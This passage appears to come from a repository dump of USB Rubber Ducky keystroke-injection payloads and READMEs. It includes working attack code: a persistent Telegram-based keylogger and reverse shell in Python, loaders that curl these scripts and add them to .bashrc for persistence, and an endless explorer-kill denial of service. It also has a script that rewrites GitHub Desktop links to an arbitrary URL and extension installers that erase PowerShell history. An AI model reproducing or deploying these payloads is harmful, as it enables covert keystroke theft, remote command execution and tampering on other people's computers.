downloading a ZIP file and extracting it to the correct location.\n- Removes any previous version of the extension.\n- Completely automated, requiring no manual intervention once the script is executed.\n\n## Requirements\n\n- **Target OS**: Windows 10/11\n- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.\n- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.\n- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....\n\n## Usage\n\n### DuckyScript Configuration\n\nBefore running the script, make sure to configure the following two variables in the script:\n\n1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.\n ```plaintext\n DEFINE #EXTENSION_NAME example\n ```\n Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.\n\n2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.\n ```plaintext\n DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip\n ```\n\n### PowerShell Commands Breakdown\n\n- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:\n ```powershell\n $extensionsPath = \"$env:USERPROFILE\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\#EXTENSION_NAME\"\n if (Test-Path -Path $extensionsPath -PathType Container) {\n Remove-Item -Recurse -Force -Path $extensionsPath\n }\n ```\n\n- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:\n ```powershell\n $url = \"#ARCHIVE_LINK\"\n $downloadPath = \"$env:TEMP\\#EXTENSION_NAME.zip\"\n $extractPath = \"$env:USERPROFILE\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\#EXTENSION_NAME\"\n Invoke-WebRequest -Uri $url -OutFile $downloadPath\n if (Test-Path -Path $downloadPath) {\n Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force\n Remove-Item -Path $downloadPath -Force\n }\n ```\n \n## Notes\n- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.\n- Make sure that PowerShell is available on the target machine.\n- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt", "content": "REM_BLOCK\n##########################################################\n# #\n# Title : Install Any Arbitrary VSCode Extension #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : Windows 10 #\n# #\n##########################################################\nEND_REM\n\nREM Replace \"example\" with the name of the extension folder\nDEFINE #EXTENSION_NAME example\n\nREM Replace \"https://example.com/path/to/archive.zip\" with your own ZIP Archive link\nDEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nGUI r\nDELAY 1000\nSTRINGLN PowerShell\nDELAY 1000\n\nSTRINGLN_POWERSHELL\n $extensionsPath = \"$env:USERPROFILE\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\#EXTENSION_NAME\"\n\n if (Test-Path -Path $extensionsPath -PathType Container) {\n Remove-Item -Recurse -Force -Path $extensionsPath\n }\nEND_STRINGLN\n\nREM May it depends by the extension...\nDELAY 2000\n\nSTRINGLN_POWERSHELL\n $url = \"#ARCHIVE_LINK\"\n $downloadPath = \"$env:TEMP\\#EXTENSION_NAME.zip\"\n $extractPath = \"$env:USERPROFILE\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\#EXTENSION_NAME\"\n Invoke-WebRequest -Uri $url -OutFile $downloadPath\n if (Test-Path -Path $downloadPath) {\n Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force\n Remove-Item -Path $downloadPath -Force\n Remove-Item (Get-PSReadlineOption).HistorySavePath; exit\n }\nEND_STRINGLN\n" }, { "path": "payloads/library/execution/Install_Official_VSCode_Extension/README.md", "content": "# Install Official VSCode Extension\n\nThis script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.\n\n## First Of All!\n\nInstalling Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.\n\nSo...\n- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.\n- Always check the source and source code before doing this\n- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.\n\n## Features\n\n- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.\n- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.\n- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.\n- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.\n\n## Usage\n\n### Required Parameter\n\n- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).\n\n## Requirements\n\n- **Operating System**: Windows 10 or 11\n- **PowerShell**\n- **Visual Studio Code**\n- **Internet**\n- **Permissions to execute commands in PowerShell**\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Install_Official_VSCode_Extension/payload.txt", "content": "REM_BLOCK\n#####################################################\n# #\n# Title : Install Official VSCode Extension #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : Windows 10/11 #\n# #\n#####################################################\nEND_REM\n\nREM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'\nDEFINE #EXTENSION publisher.extensionName\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nGUI r\nDELAY 1000\nSTRINGLN PowerShell\nDELAY 1000\n\nSTRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit\n" }, { "path": "payloads/library/execution/Kill-Explorer/Kill-Explorer.txt", "content": "EXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nREM_BLOCK\nTitle: Kill-Explorer\nVersion 1.0\nTarget: Windows 10, 11\nAuthor: Nate\nBrief Description: Kill the explorer process repeatedly causing loss of Windows Desktop functionality.\nEND_REM\n\nGUI r\nDELAY 500\nSTRINGLN powershell /w 1 while($true){kill -name explorer}\n" }, { "path": "payloads/library/execution/Kill-Explorer/README.md", "content": "# Kill-Explorer\nA ducky script that kills explorer.exe repeatedly resulting in loss of Windows Desktop functionality. The command executed is a simple Denial of Service for the intended user.\n## Configuration\n1. Execute on windows 10 or Windows 11.\n2. Logoff or restart to reset your windows session.\n## Notes\nA great tool for distractions or social engineering.\n## Windows Command (used in payload)\n```Powershell\npowershell /w 1 while($true){kill -name explorer}\n```\n" }, { "path": "payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md", "content": "# Make Windows performant (but ugly and boring)\n\nThis script can be used to change some advanced Windows settings to make it as efficient as possible albeit losing some of the fluidity and beauty of the operating system.\n\nThis script is Plug-And-Play <3\n\n**Category**: Execution\n\n![](Make_Windows_performant_but_ugly_and_boring.gif)\n\n## Description\n\nThis script can be used to change some advanced Windows settings to make it as efficient as possible albeit losing some of the fluidity and beauty of the operating system.\n\nThe script opens the Windows advanced settings via sysdm.cpl and accesses the advanced settings by changing the selected option for best performance and unchecking all possible features.\n\n### Dependencies\n\n* Nothing is needed, this script is Plug-And-Play <3\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt", "content": "REM ##################################################################\nREM # |\nREM # Title : Make Windows performant (but ugly and boring) |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM ##################################################################\n\nREM Plug-And-Play <3\n\nREM Requirements:\nREM - Nothing\n\nREM Note:\nREM - Payload tested on Windows 11 Eng \n\n\nGUI r\nDELAY 2000\n\nREM Open advanced settings\nSTRING sysdm.cpl\nENTER\nDELAY 2000\n\nREM Goto nav bar\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\n\nREM Goto Advanced\nRIGHTARROW\nDELAY 500\nRIGHTARROW\nDELAY 500\n\nREM Open Settings\nTAB\nDELAY 500\nREM Invia il comando\nENTER\nDELAY 1000\n\nREM Adjust for best performance\nDOWNARROW\nDELAY 500\nDOWNARROW\nDELAY 500\n\nREM Save it\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 3000\n\nREM Close the windows (not the os lol)\nALT F4\nDELAY 500\nALT F4\nDELAY 500\n" }, { "path": "payloads/library/execution/Persistent_Keylogger-Telegram_Based/README.md", "content": "# Persistent Keylogger - Telegram Based\n\nA script used to configure a persistent keylogger on a Linux computer through a pre-configured Telegram Bot.\n\n**Category**: Execution\n\n## Dependencies\n\n* Internet Connection\n\n## Description\n\nA script used to configure a persistent keylogger on a Linux computer through a pre-configured Telegram Bot.\n\nThis payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.\n\nIn the script, you can find two classes that inherit Thread called Keylogger and Sender, and a shared memory class called Log. The Thread classes perform two distinct tasks:\n\n- Keylogger: The Keylogger class is responsible for capturing the pressed keys using the keyboard library. Based on the detected key, a modified callback function specified in the function call is invoked. When the usage of a certain keyboard key is detected, it is subsequently added to the log variable using the `add_to_log()` method of the `self.log` object from the Log class.\n\n- Sender: The Sender class represents a thread solely dedicated to periodically invoking the `send_log()` method of the `self.log` object from the Log class.\n\n- Log: The Log class represents a shared memory entity. The shared memory is the variable `self.log`, which is periodically managed through the `add_to_log()` and `send_log()` methods. This class was designed with the aim of avoiding data loss, and thus a lock management system was applied to prevent undesirable or unexpected situations when multiple users write rapidly. To handle the locks, `RLock` and `Condition` were chosen in the respective methods of the class.\n\nThe `add_to_log(self, log)` method acquires the lock through the invocation of `with self.lock` and updates the internal variable with the new received character. As the only waiting condition on the lock management is when the variable `self.lock` is empty, immediately after updating the internal variable, the unlocking function `self.condition.notify_all()` is invoked, allowing all threads (in this case, actually only 1, the Sender) to wake up and proceed with the sending operation.\n\nThe `send_log(self)` method acquires the lock and enters a waiting condition using `self.condition.wait()` if the variable `self.log` is empty. Once the lock is reacquired following a wake-up, the Sender Thread proceeds with sending the message using the `bot.send_message(...)` command, resetting the `self.log` variable to an empty initial state.\n\nIt is worth noting that although this Telegram bot could be used dynamically by anyone, it might be a good practice to use the ID statically (line 16 of the Python file) since the message recipients will always be you and not someone else (at least it shouldn't be so). This aspect may be considered less secure as it exposes sensitive and delicate information concerning your privacy and identity. However, since this script is not intended for malicious purposes or real-world use, but rather for educational purposes, it has been thoughtfully created and designed for study purposes.\n\nBecause Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Persistent_Keylogger-Telegram_Based/connection.py", "content": "from telebot import TeleBot\nfrom time import sleep\nimport keyboard\nfrom threading import Thread,RLock,Condition\n\n# Set here the Telegram bot token\nBOT_TOKEN = \"\"\nbot = TeleBot(BOT_TOKEN)\n\nclass Log:\n def __init__(self):\n self.log = \"\"\n self.lock = RLock()\n self.condition = Condition(self.lock)\n # Set here the Telegram user id\n self.id = \"0123456789\"\n \n def add_to_log(self, log):\n \twith self.lock:\n \t #print(\"Adding to log...\")\n \t self.log += log\n \t self.condition.notify_all()\n \n def send_log(self):\n with self.lock:\n #print(\"Sending to bot...\")\n while self.log == \"\":\n #print(\"Waiting resources...\")\n self.condition.wait()\n #print(\"Sending message!\")\n bot.send_message(self.id, self.log)\n self.log = \"\"\n\nclass Keylogger(Thread):\n\n def __init__(self, log):\n super().__init__()\n self.log = log\n \n def callback(self, event):\n name = event.name\n if len(name) > 1:\n if name == \"space\":\n name = \"[SPACE]\"\n elif name == \"enter\":\n name = \"[ENTER]\\n\"\n elif name == \"decimal\":\n name = \".\"\n else:\n name = name.replace(\" \", \"_\")\n name = f\"[{name.upper()}]\"\n #print(f\"Keylogger add to log: {name}\")\n self.log.add_to_log(name)\n \n def run(self):\n keyboard.on_release(callback=self.callback)\n\nclass Sender(Thread):\n\n def __init__(self, log):\n super().__init__()\n self.log = log\n \n def run(self):\n while True:\n sleep(5)\n #print(\"Sender send log\")\n self.log.send_log()\n\n\nlog = Log()\n\nkeylogger = Keylogger(log)\nkeylogger.start()\n\nsender = Sender(log)\nsender.start()\n\nbot.infinity_polling()\n" }, { "path": "payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt", "content": "REM ########################################################\nREM # #\nREM # Title : Persistent Keylogger - Telegram Based #\nREM # Author : Aleff #\nREM # Version : 1.0 #\nREM # Category : Execution #\nREM # Target : Linux #\nREM # #\nREM ########################################################\n\nREM Requirements:\nREM - Internet Connection\n\nREM Here you must put your own file link\nDEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\nSTRINGLN_BLOCK\n\tcurl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then\n\tpython3 connection.py &\n\tfi\" >> .bashrc; exit\nEND_STRINGLN\n" }, { "path": "payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md", "content": "# Persistent Reverse Shell - Telegram Based\n\nA script used to configure a persistent reverse shell on a Linux computer through a pre-configured Telegram Bot.\n\n**Category**: Execution\n\n## Dependencies\n\n* Internet Connection\n\n## Description\n\nA script used to configure a persistent reverse shell on a Linux computer through a pre-configured Telegram Bot.\n\nThis payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.\n\nThe script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` through the `extract_command()` function, then execute the command acquired acquiring the output through the function `run_command()`.\n\nBecause Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py", "content": "from telebot import TeleBot, types\nimport subprocess\n\n# Set here the Telegram bot token\nBOT_TOKEN = \"\"\nbot = TeleBot(BOT_TOKEN)\n\ncommands = [\n types.BotCommand(\"/reverse\", \"/reverse \")\n]\n\nbot.set_my_commands(commands=commands)\n\n@bot.message_handler(commands=['reverse'])\ndef reverse_shell(message):\n command = extract_command(message.text)\n if command != \"\":\n print(f\"Command received: {command}\")\n out = run_command(command)\n if len(out) > 1000:\n bot.reply_to(message, \"Message too long...\")\n chunk_size = 1000\n for i in range(0, len(out), chunk_size):\n bot.send_message(message.chat.id, out[i:i+chunk_size])\n else:\n bot.reply_to(message, out)\n\ndef extract_command(message):\n command_prefix = \"/reverse\"\n if message.startswith(command_prefix):\n return message[len(command_prefix):].strip()\n else:\n return None\n\ndef run_command(command):\n try:\n result = subprocess.check_output(command, shell=True, text=True)\n return result.strip()\n except subprocess.CalledProcessError as e:\n return f\"Some error: {e}\"\n\n\nbot.infinity_polling()\n" }, { "path": "payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt", "content": "REM ############################################################\nREM # #\nREM # Title : Persistent Reverse Shell - Telegram Based #\nREM # Author : Aleff #\nREM # Version : 1.0 #\nREM # Category : Execution #\nREM # Target : Linux #\nREM # #\nREM ############################################################\n\nREM Requirements:\nREM - Internet Connection\n\nREM Here you must put your own file link\nDEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\nSTRINGLN_BLOCK\n\tcurl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then\n\tpython3 connection.py &\n\tfi\" >> .bashrc; exit\nEND_STRINGLN\n" }, { "path": "payloads/library/execution/Play_A_Song_On_An_iPhone/README.md", "content": "# Play A Song On An iPhone\n\nThis script can be used to play a song really fast using an iPhone, so iOS system.\n\nOpen search bar, then open the Music app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.\n\n**Category**: Execution\n\n## Dependencies\n\n* The phone must be unlocked\n\n## Test\n\n- iPhone 14\n- iOS 16.4.1\n\n## Settings\n\n- You need to change the name of the application according to the language you have on your phone.\n\n ```DuckyScript\n [20] DEFINE #MUSIC-APP-NAME example\n ```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Play_A_Song_On_An_iPhone/payload.txt", "content": "REM_BLOCK\n##############################################\n# #\n# Title : Play A Song On An iPhone #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : iPhone #\n# #\n##############################################\nEND_REM\n\nREM Requirements:\nREM - The phone must be unlocked\n\nREM Tested on:\nREM - iPhone 14\nREM - iOS 16.4.1\n\nREM You need to change the name of the application according to the language you have on your phone.\nDEFINE #MUSIC-APP-NAME example\n\nDELAY 500\nGUI SPACE\nDELAY 300\nSTRINGLN #MUSIC-APP-NAME\nDELAY 1000\nSPACE\nDELAY 500\nGUI h\n" }, { "path": "payloads/library/execution/Replace_Links_In_GithubDesktop/README.md", "content": "# Replace Links In GithubDesktop\n\nThis script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.\n\n![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)\n\n## Table of Contents\n\n- [Features](#features)\n- [Prerequisites](#prerequisites)\n- [Usage](#usage)\n- [Credits](#credits)\n\n## Features\n\nThis script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:\n\n1. Detects the installation folder of GitHub Desktop.\n2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.\n3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.\n\nThe script uses **PowerShell** to perform this replacement after detecting the operating system and target files.\n\n## Prerequisites\n\n- **Windows 10/11**\n- **GitHub Desktop** installed on the machine.\n\n## Usage\n\n1. **Modify the script**:\n - Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:\n ```duckyscript\n DEFINE #NEW_LINK example.com\n ```\n\n2. **Customization**:\n - Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:\n ```ducky\n DEFINE #SUBDIRECTORY \\AppData\\Local\\GitHubDesktop\n ```\n\n3. **Execution**:\n - Upon execution, the script will:\n - Open PowerShell.\n - Detect the GitHub Desktop installation directory.\n - Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt", "content": "REM_BLOCK\n#####################################################\n# #\n# Title : Replace Links In GithubDesktop #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : Windows 10/11 #\n# #\n#####################################################\nEND_REM\n\n\nREM REQUIRED - Define here the new url that will replace the original github link\nDEFINE #NEW_LINK example.com\n\nREM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default\nDEFINE #SUBDIRECTORY \\AppData\\Local\\GitHubDesktop\n\n\nREM_BLOCK\n Credits: Hak5 LLC\n Website: https://hak5.org/\n Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt\nEND_REM\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\n\nGUI r\nDELAY 1000\nSTRINGLN PowerShell\nDELAY 1000\n\nSTRINGLN_POWERSHELL\n $path = Join-Path -Path $env:USERPROFILE -ChildPath \"#SUBDIRECTORY\"\n\n $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like \"app-*\" }\n\n $versions = $folders | ForEach-Object {\n [PSCustomObject]@{\n FolderName = $_.Name\n Version = [version]($_.Name -replace \"app-\", \"\")\n }\n }\n\n $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1\n\n $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName\n $latestFolderPath += \"\\resources\\app\\\"\n $renderer = \"renderer.js\"\n $main = \"main.js\"\n\n $filePath = \"$latestFolderPath$renderer\"\n\n $fileContent = Get-Content $filePath\n $regex = [regex]'(https:\\/\\/(?![\\w\\d\\.\\/\\-]*api)[\\w\\d\\.\\/\\-]*github[\\w\\d\\.\\/\\-]+)'\n $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'\n Set-Content -Path $filePath -Value $modifiedContent\n\n\n $filePath = \"$latestFolderPath$main\"\n $fileContent = Get-Content $filePath\n $regex = [regex]'openExternal\\(\"(https:\\/\\/[\\w\\d\\.\\/\\-]*github[\\w\\d\\.\\/\\-]+)\"\\)'\n $modifiedContent = $fileContent -replace $regex, ('openExternal(\"#NEW_LINK\")')\n Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit\n\nEND_STRINGLN\n" }, { "path": "payloads/library/execution/SendEmailThroughThunderbird/README.md", "content": "# Send Email Through Thunderbird\n\nThis payload can be used to prank friends by sending emails at top speed from their thunderbird clients.\n\n**Category**: Execution\n\n## Description\n\nThis payload can be used to prank friends by sending emails at top speed from their thunderbird clients.\n\nThis payload opens a shell (or powershell if running on windows), starts the Thunderbird application, and via the CTRL N sequence starts the email sending functionality that is not protected by any security system. After that it writes the recipient's email, the subject of the email and the body of the message and sends.\n\n## Getting Started\n\n### Windows 11\n\n```DuckyScript\nDELAY 1000\nGUI r\nDELAY 1000\nSTRING powershell\nENTER\nDELAY 2000\nSTRINGLN Start-Process \"thunderbird.exe\"\nDELAY 4000\n```\n\n### Ubuntu 23.04\n\n```DuckyScript\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\nSTRINGLN thunderbird\nDELAY 4000\n```\n\n### Dependencies\n\n* Internet Connection\n* Thunderbird installed and email configured\n* ExecutionPolicy Bypass (for Windows target)\n\n### Settings\n\n- Receiver email address\n- Email Subject\n- Email Message\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/SendEmailThroughThunderbird/payload.txt", "content": "REM ########################################################\nREM # |\nREM # Title : Send Email Through Thunderbird |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 - Linux(debian tested) |\nREM # |\nREM ########################################################\n\n\nREM Requirements:\nREM - Internet Connection\nREM - Thunderbird installed and email configured\nREM - ExecutionPolicy Bypass (for Windows target)\n\nREM This payload is tested on:\nREM - Ubuntu 23.04\nREM - Windows 11\n\nREM REQUIRED - Set receiver email address\nDEFINE EMAIL-ADDRESS example@change-it.org\n\nREM REQUIRED - Set email Subject\nDEFINE SUBJECT example\n\nREM REQUIRED - Set email message\nDEFINE MESSAGE example\n\n\nREM # PowerShell\nDELAY 1000\nGUI r\nDELAY 1000\nSTRING powershell\nENTER\nDELAY 2000\nSTRINGLN Start-Process \"thunderbird.exe\"\nDELAY 4000\n\nREM # Thunderbird\nCTRL n\nDELAY 2000\nSTRING 